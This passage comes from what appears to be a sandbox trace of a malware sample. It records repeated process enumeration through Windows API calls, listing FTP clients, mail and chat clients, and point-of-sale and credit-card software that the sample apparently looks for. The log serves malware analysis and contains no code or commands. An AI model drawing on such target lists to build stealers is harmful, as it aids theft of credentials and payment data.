dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0274.289] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0274.291] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0274.295] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0274.297] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0274.298] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0274.299] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0274.301] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0274.302] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0274.304] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0274.305] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0274.307] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0274.308] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0274.313] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0274.317] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0274.320] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0274.376] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0274.378] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0274.380] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0274.382] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0274.384] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0274.391] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0274.393] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0274.396] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0274.398] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0274.400] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0274.406] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0274.408] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0274.410] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0274.412] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0274.415] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0274.432] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0274.435] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0274.438] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0274.440] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0274.441] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0274.443] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0274.444] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0274.446] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0274.448] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0274.452] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0274.454] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0274.455] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0274.457] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0274.459] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0274.460] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0274.462] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0274.464] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0274.468] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0274.470] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0274.472] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0274.473] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0274.475] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0274.477] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0274.479] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0274.533] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0274.535] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0274.536] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0274.538] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0274.539] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0274.542] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0274.546] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0274.547] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0274.549] CloseHandle (hObject=0x1d14) returned 1 [0274.549] Sleep (dwMilliseconds=0x64) [0274.667] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0274.680] Process32First (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.682] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0274.686] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0274.688] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0274.689] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0274.691] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0274.692] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0274.694] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0274.696] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0274.697] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.701] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.703] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0274.704] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.706] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.707] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.708] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.710] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.711] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.713] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.746] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0274.748] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0274.750] Process32Next (in: 